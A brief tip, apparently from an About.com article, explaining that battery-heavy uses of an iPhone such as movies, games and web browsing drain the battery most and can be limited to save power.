Not all ways to save battery life involve settings. Some of them involve the way you use the phone. Things that require the phone be on for long periods of time, or use a lot of system resources, suck the most battery. These things include movies, games, and browsing the web. If you need to conserve battery, limit your use of battery-intensive apps.

Source: http://ipod.about.com/od/iphone3g/tp/iphone-battery-life.01.htm